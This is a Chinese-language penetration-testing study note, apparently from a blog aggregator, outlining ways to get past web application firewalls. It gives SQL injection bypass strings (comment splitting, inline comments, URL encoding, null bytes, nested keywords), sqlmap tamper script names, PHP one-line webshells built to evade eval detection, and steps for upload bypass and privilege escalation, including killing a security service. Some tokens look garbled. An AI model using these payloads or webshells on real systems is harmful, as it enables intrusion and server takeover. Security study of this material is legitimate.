渗透测试学习 二十8、WAF绕过详解
大纲:php
WAF防御原理讲解mysql
目录扫描绕过WAFweb
手工注入绕过WAFsql
sqlmap绕过WAFshell
编写salmap绕过WAF安全
过WAF一句话编写讲解服务器
菜刀链接绕过WAFcookie
webshell上传绕过WAFapp
提权绕过WAF函数
WAF绕过原理详解
知己知彼百战百胜
了解WAF防御原理
查看WAF防御位置
熟悉防御规则
了解防御机制
查看拦截时间阀值
目录扫描绕过WAF
两种方式:
一、修改客户端IP
二、减慢扫描速度
三、经过代理欺骗WAF
手工注入绕过WAF
搭建测试环境
了解绕过原理
熟悉常见绕过构造语句
构造绕过测试环境
搭建环境
利用mysql客户端
配置注入源码
注入绕过方法
一、大小写变种
二、SQL注释
三、URL编码
四、空字节
五、嵌套、剥离
六、非标准入口点
七、避开自定义过滤器
使用注释
union select 1,2,3 from admin
注释完
/**/union/**/select/**/1,2,3 from admin
/**/un/**/io/**/n/**/sel/**/ec/**/t/**/ 1,2,3 from admin
第二种注释
/*!and*/ 1=2
URL编码
正常编码
‘为%27
1=52f *=%2a %=%25
/**/=%25 2f%25 2a*1
空字节
一些过滤器处理输入时,碰到拿到空字节就会中止处理。
如:
id=1%00and1=2
嵌套剥离
一些过滤器将用户的输入进行剥离敏感函数
应对方法:
seleselectect
剥离后
select
总结编写绕过语句
利用注释
/*^abc^*/
包含关键字
/*!/*!/*!union*/
变换提交方式
get->post方式或cookie
sqlmap tamper利用
symboliclogical.py
space2mssqlhash.py
appendnullbyte.py
利用修改tamper绕过waf
尝试编写过waf一句话
思路:
利用可变变量
$a=b $b=c $$a=c
利用函数
利用判断语句
利用编码
<?php
@eval($_POST[x]);
?>
会拦截eval函数
<?php
@$_GET[a]($_post[x]);
?>
a:动态的传参,传eval函数或assert等函数
突破waf拦截链接菜刀
用最新版的菜刀
中国蚁剑
过狗菜刀+中转脚本
上传过waf
上传突破禁止上传PHP脚本
一、文件包含
二、双文件上传突破限制
三、修改上传参数
提权过waf
经过程序读密码
利用waf绕过神器
利用exp读hash
将用户添加到远程桌面组,并给目录降权
用第三方软件提权
system把安全狗服务中止,重启服务器
- 1. 渗透测试学习 二十7、内网渗透
- 2. 渗透测试学习(1)
- 3. 渗透测试 学习一
- 4. 渗透测试
- 5. 渗透测试学习 十8、 XSS跨站脚本漏洞详解 续
- 6. web渗透测试8
- 7. 渗透测试 day1
- 8. 渗透测试学习 二十4、提权 上
- 9. 渗透测试学习 二十5、提权 下
- 10. 渗透测试学习 二十6、提权 远控
- 更多相关文章...
- • Maven 构建 & 项目测试 - Maven教程
- • 免费ARP详解 - TCP/IP教程
- • Kotlin学习(二)基本类型
- • Tomcat学习笔记(史上最全tomcat学习笔记)
-
每一个你不满意的现在,都有一个你没有努力的曾经。
- 1. 渗透测试学习 二十7、内网渗透
- 2. 渗透测试学习(1)
- 3. 渗透测试 学习一
- 4. 渗透测试
- 5. 渗透测试学习 十8、 XSS跨站脚本漏洞详解 续
- 6. web渗透测试8
- 7. 渗透测试 day1
- 8. 渗透测试学习 二十4、提权 上
- 9. 渗透测试学习 二十5、提权 下
- 10. 渗透测试学习 二十6、提权 远控